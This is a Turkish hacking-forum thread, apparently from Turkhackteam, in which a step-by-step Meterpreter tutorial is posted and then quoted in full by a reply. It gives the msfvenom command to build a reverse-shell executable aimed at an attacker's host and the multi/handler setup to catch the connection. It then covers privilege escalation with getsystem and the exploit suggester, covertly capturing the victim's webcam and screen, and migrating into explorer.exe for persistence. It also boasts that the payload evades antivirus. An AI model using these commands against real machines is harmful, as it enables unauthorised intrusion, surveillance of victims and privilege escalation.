Meterpreter Diğer Adıyla Payloadların BABASI

12 Eyl 2023
79
30
Meterpreter payloadların babalarıdır aklınıza gelen bir çok şeyi yapabilirsiniz; cihazın kamerasına ulaşmak, ekranını görüntülemek, klavyesine erişmemiz gibi.

Meterpreter RAM içerisinde çalışır bunun nedeni bir çoğu güvenlik cihazının sadece diske yazılan öğeleri tarar yani bu şekilde meterpreter aradan sıyrılır.

Bir diğer özelliği ise diğer payloadlara kıyasla kendisini bir dosya olarak değil kendisini proses(süreç) olarak gösterir.

Meterpreter payloadlarına bakmak için `msfvenom --list payloads | grep meterpreter` komutunu kullanabilirsiniz.

Bu arada Meterpreterı sadece Windows için değil Linux, Android, İOS, JAVA gibi sistemlerde de kullanabilirsiniz.

`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=111.111.1.11 LPORT=443 -f exe -o meterpreter.exe` Evet normal bir payload gibi çalıştırıyoruz Meterpreterı şimdi portu dinlemeye alalım.

Portu dinlemeye almadan önce birşey hatırlayım bunun gibi bir payloada ncat işlemez bağlantısı kopar bunun için Metasploitin içinde olan **Multi Handler** kullanırız.
`use multi/handler`
`set payload windows/x64/meterpreter_reverse_tcp`
`set LHOST=111.111.1.11`
`set LPORT=443`
`run`

Evet artık payload çalıştırıldığında sisteme sızmış oluruz. Sisteme sızdıktan sonra yetki yükseltmek isterseniz `getsystem` komutunu yazabilirsiniz bu komut gerekli tokenleri bulursa çalışır.

Eğlence kısmına gelcek olursak şu komutları deneyebilirsiniz.
`screenshot`
`webcam_snap`
`screenshare`
`webcam_stream`

Eğlence kısmından çıkıp asıl amacımıza odaklanıcak olursak unutmayın başlarken size birşey demiştim meterpreterın RAM'de çalıştığı yani bu demek oluyorki bizim maceramız sistemin kapanmasına kadar bunu bundan kurtarmak için kendimizi sistem açıldığı andan itibaren çalışan bir proses'e migrate olmamız gerek.

Aktif olarak çalışan prosesleri görüntülemek için `ps` komutunu kullanabiliriz.

Migrate etme kısmına tekrardan gelicek olursak birşey daha eklemem gerek migrate olurken sadece kendi yetkilerimize sahip bir proses'e migrate olabiliriz yani kök yetkilerine sahip değilken service.exe'ye migrate olamayız bizim migrate olacağımız şeylerden birtanesi explorer.exe 'dir bu Windowsun arayüzüdür yani sistem çalıştığı andan itibaren aktif hale gelir.

Eğer kendimize chrome.exe gibi bir proses'e migrate edersek sadece kullanıcı chrome açtığında aktif hale geliriz.

Migrate olmak için `migrate id` komutunu kullanırız idlere `ps` komutundan bakarız.

Son olarak aklına takılmış olabilceğinden System olmayı yani yetki yükseltmeyi göstericeğim.

Bunun içinde bir exploit kulllancağız şu şekilde:
`msfconsole`
`search suggester`
`options`
Bizden istenen sadece bir Sessions id.
`sessions`
Bu komutu yazdığımızda aktif olarak kullandığımız meterpreter payloadı gözükücektir bunun id'sini girelim.
`set sessions 1`
Veee
`run`
Şimdi bize biraz metasploit modüllerini araştırıcak ve hedefin hangi modüllere karşı zafiyeti varsa onu bize sunucak.

Zafiyeti modülünü bulduğunu ve options kısmını doldurduğumuzu varsayarsak artık tamam, yani 2. meterpreter sessionun açıldığına dair bir mesaj aldıysanız tamam.

Artık tekrar gidip meterpreterda `getsystem` komutunu çalıştırın.
BOOM artık haklara sahibiz :D
 

Arenklord

Uzman üye
9 Mar 2023
1,294
666
Orta doğu
Meterpreter payloadların babalarıdır aklınıza gelen bir çok şeyi yapabilirsiniz; cihazın kamerasına ulaşmak, ekranını görüntülemek, klavyesine erişmemiz gibi.

Meterpreter RAM içerisinde çalışır bunun nedeni bir çoğu güvenlik cihazının sadece diske yazılan öğeleri tarar yani bu şekilde meterpreter aradan sıyrılır.

Bir diğer özelliği ise diğer payloadlara kıyasla kendisini bir dosya olarak değil kendisini proses(süreç) olarak gösterir.

Meterpreter payloadlarına bakmak için `msfvenom --list payloads | grep meterpreter` komutunu kullanabilirsiniz.

Bu arada Meterpreterı sadece Windows için değil Linux, Android, İOS, JAVA gibi sistemlerde de kullanabilirsiniz.

`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=111.111.1.11 LPORT=443 -f exe -o meterpreter.exe` Evet normal bir payload gibi çalıştırıyoruz Meterpreterı şimdi portu dinlemeye alalım.

Portu dinlemeye almadan önce birşey hatırlayım bunun gibi bir payloada ncat işlemez bağlantısı kopar bunun için Metasploitin içinde olan **Multi Handler** kullanırız.
`use multi/handler`
`set payload windows/x64/meterpreter_reverse_tcp`
`set LHOST=111.111.1.11`
`set LPORT=443`
`run`

Evet artık payload çalıştırıldığında sisteme sızmış oluruz. Sisteme sızdıktan sonra yetki yükseltmek isterseniz `getsystem` komutunu yazabilirsiniz bu komut gerekli tokenleri bulursa çalışır.

Eğlence kısmına gelcek olursak şu komutları deneyebilirsiniz.
`screenshot`
`webcam_snap`
`screenshare`
`webcam_stream`

Eğlence kısmından çıkıp asıl amacımıza odaklanıcak olursak unutmayın başlarken size birşey demiştim meterpreterın RAM'de çalıştığı yani bu demek oluyorki bizim maceramız sistemin kapanmasına kadar bunu bundan kurtarmak için kendimizi sistem açıldığı andan itibaren çalışan bir proses'e migrate olmamız gerek.

Aktif olarak çalışan prosesleri görüntülemek için `ps` komutunu kullanabiliriz.

Migrate etme kısmına tekrardan gelicek olursak birşey daha eklemem gerek migrate olurken sadece kendi yetkilerimize sahip bir proses'e migrate olabiliriz yani kök yetkilerine sahip değilken service.exe'ye migrate olamayız bizim migrate olacağımız şeylerden birtanesi explorer.exe 'dir bu Windowsun arayüzüdür yani sistem çalıştığı andan itibaren aktif hale gelir.

Eğer kendimize chrome.exe gibi bir proses'e migrate edersek sadece kullanıcı chrome açtığında aktif hale geliriz.

Migrate olmak için `migrate id` komutunu kullanırız idlere `ps` komutundan bakarız.

Son olarak aklına takılmış olabilceğinden System olmayı yani yetki yükseltmeyi göstericeğim.

Bunun içinde bir exploit kulllancağız şu şekilde:
`msfconsole`
`search suggester`
`options`
Bizden istenen sadece bir Sessions id.
`sessions`
Bu komutu yazdığımızda aktif olarak kullandığımız meterpreter payloadı gözükücektir bunun id'sini girelim.
`set sessions 1`
Veee
`run`
Şimdi bize biraz metasploit modüllerini araştırıcak ve hedefin hangi modüllere karşı zafiyeti varsa onu bize sunucak.

Zafiyeti modülünü bulduğunu ve options kısmını doldurduğumuzu varsayarsak artık tamam, yani 2. meterpreter sessionun açıldığına dair bir mesaj aldıysanız tamam.

Artık tekrar gidip meterpreterda `getsystem` komutunu çalıştırın.
BOOM artık haklara sahibiz :D
eline sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.